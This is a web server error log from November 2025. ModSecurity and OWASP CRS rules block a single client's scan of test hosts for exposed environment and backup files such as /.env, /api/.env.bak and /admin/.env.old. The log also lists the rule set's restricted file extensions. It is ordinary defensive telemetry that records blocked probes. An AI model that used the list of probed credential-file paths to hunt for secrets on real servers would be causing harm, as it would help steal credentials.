[Tue Nov 18 14:51:06.389889 2025] [:error] [pid 153863] [client 34.235.129.146:41114] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aRx5yuo53hvRBsk5IfbhWAAAAAA"]
[Tue Nov 18 14:51:06.390040 2025] [:error] [pid 153863] [client 34.235.129.146:41114] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aRx5yuo53hvRBsk5IfbhWAAAAAA"]
[Tue Nov 18 14:51:25.306224 2025] [:error] [pid 160877] [client 34.235.129.146:57100] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRx53QgYjeY2f7-QfdJuqAAAAAI"]
[Tue Nov 18 14:51:25.306526 2025] [:error] [pid 160877] [client 34.235.129.146:57100] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRx53QgYjeY2f7-QfdJuqAAAAAI"]
[Tue Nov 18 14:51:25.306726 2025] [:error] [pid 160877] [client 34.235.129.146:57100] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aRx53QgYjeY2f7-QfdJuqAAAAAI"]
[Tue Nov 18 14:51:25.308787 2025] [:error] [pid 160881] [client 34.235.129.146:57110] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRx53cKvHpCFfzvQgqZeyAAAAAQ"]
[Tue Nov 18 14:51:25.308932 2025] [:error] [pid 160881] [client 34.235.129.146:57110] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRx53cKvHpCFfzvQgqZeyAAAAAQ"]
[Tue Nov 18 14:51:25.309090 2025] [:error] [pid 160881] [client 34.235.129.146:57110] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRx53cKvHpCFfzvQgqZeyAAAAAQ"]
[Tue Nov 18 14:51:25.309244 2025] [:error] [pid 160881] [client 34.235.129.146:57110] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRx53cKvHpCFfzvQgqZeyAAAAAQ"]
[Tue Nov 18 14:51:25.316366 2025] [:error] [pid 166202] [client 34.235.129.146:57104] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.bak"] [unique_id "aRx53bjjT4drRne9BbQuqAAAAAk"]
[Tue Nov 18 14:51:25.316506 2025] [:error] [pid 166202] [client 34.235.129.146:57104] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.bak"] [unique_id "aRx53bjjT4drRne9BbQuqAAAAAk"]
[Tue Nov 18 14:51:25.316651 2025] [:error] [pid 166202] [client 34.235.129.146:57104] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.bak"] [unique_id "aRx53bjjT4drRne9BbQuqAAAAAk"]
[Tue Nov 18 14:51:25.316796 2025] [:error] [pid 166202] [client 34.235.129.146:57104] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.bak"] [unique_id "aRx53bjjT4drRne9BbQuqAAAAAk"]
[Tue Nov 18 14:51:25.348486 2025] [:error] [pid 160239] [client 34.235.129.146:57126] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRx53e1NcONF8naoxQFe9gAAAAw"]
[Tue Nov 18 14:51:25.348658 2025] [:error] [pid 160239] [client 34.235.129.146:57126] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRx53e1NcONF8naoxQFe9gAAAAw"]
[Tue Nov 18 14:51:25.348811 2025] [:error] [pid 160239] [client 34.235.129.146:57126] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRx53e1NcONF8naoxQFe9gAAAAw"]
[Tue Nov 18 14:51:25.350246 2025] [:error] [pid 154301] [client 34.235.129.146:57138] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.bak"] [unique_id "aRx53e18X441rUDF_U5eRwAAAAg"]
[Tue Nov 18 14:51:25.350462 2025] [:error] [pid 154301] [client 34.235.129.146:57138] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.bak"] [unique_id "aRx53e18X441rUDF_U5eRwAAAAg"]
[Tue Nov 18 14:51:25.350636 2025] [:error] [pid 154301] [client 34.235.129.146:57138] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.bak"] [unique_id "aRx53e18X441rUDF_U5eRwAAAAg"]
[Tue Nov 18 14:51:25.350796 2025] [:error] [pid 154301] [client 34.235.129.146:57138] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.bak"] [unique_id "aRx53e18X441rUDF_U5eRwAAAAg"]
[Tue Nov 18 14:51:25.419365 2025] [:error] [pid 160906] [client 34.235.129.146:57150] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRx53f7FUeIdxVPAs5igugAAAAY"]
[Tue Nov 18 14:51:25.419579 2025] [:error] [pid 160906] [client 34.235.129.146:57150] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRx53f7FUeIdxVPAs5igugAAAAY"]
[Tue Nov 18 14:51:25.419742 2025] [:error] [pid 160906] [client 34.235.129.146:57150] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aRx53f7FUeIdxVPAs5igugAAAAY"]
[Tue Nov 18 14:51:25.466550 2025] [:error] [pid 160237] [client 34.235.129.146:57154] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRx53U0XkfZCrdQo7dFhWQAAAAM"]
[Tue Nov 18 14:51:25.466771 2025] [:error] [pid 160237] [client 34.235.129.146:57154] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRx53U0XkfZCrdQo7dFhWQAAAAM"]
[Tue Nov 18 14:51:25.466944 2025] [:error] [pid 160237] [client 34.235.129.146:57154] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aRx53U0XkfZCrdQo7dFhWQAAAAM"]
[Tue Nov 18 14:51:26.826785 2025] [:error] [pid 160901] [client 34.235.129.146:51312] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRx53h54imVYfbO8_klVVAAAAAU"]
[Tue Nov 18 14:51:26.826952 2025] [:error] [pid 160901] [client 34.235.129.146:51312] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRx53h54imVYfbO8_klVVAAAAAU"]
[Tue Nov 18 14:51:26.827154 2025] [:error] [pid 160901] [client 34.235.129.146:51312] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRx53h54imVYfbO8_klVVAAAAAU"]
[Tue Nov 18 14:51:26.827322 2025] [:error] [pid 160901] [client 34.235.129.146:51312] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.old"] [unique_id "aRx53h54imVYfbO8_klVVAAAAAU"]
[Tue Nov 18 14:51:26.878010 2025] [authz_core:error] [pid 163656] [client 34.235.129.146:51320] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.bak
[Tue Nov 18 14:51:26.966881 2025] [authz_core:error] [pid 160877] [client 34.235.129.146:51346] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.save
[Tue Nov 18 14:51:26.970852 2025] [:error] [pid 153863] [client 34.235.129.146:51330] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRx53uo53hvRBsk5IfbhWQAAAAA"]
[Tue Nov 18 14:51:26.971054 2025] [:error] [pid 153863] [client 34.235.129.146:51330] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRx53uo53hvRBsk5IfbhWQAAAAA"]
[Tue Nov 18 14:51:26.971225 2025] [:error] [pid 153863] [client 34.235.129.146:51330] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRx53uo53hvRBsk5IfbhWQAAAAA"]
[Tue Nov 18 14:51:27.002514 2025] [:error] [pid 160881] [client 34.235.129.146:51344] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRx538KvHpCFfzvQgqZeyQAAAAQ"]
[Tue Nov 18 14:51:27.002708 2025] [:error] [pid 160881] [client 34.235.129.146:51344] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRx538KvHpCFfzvQgqZeyQAAAAQ"]
[Tue Nov 18 14:51:27.002847 2025] [:error] [pid 160881] [client 34.235.129.146:51344] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.save"] [unique_id "aRx538KvHpCFfzvQgqZeyQAAAAQ"]
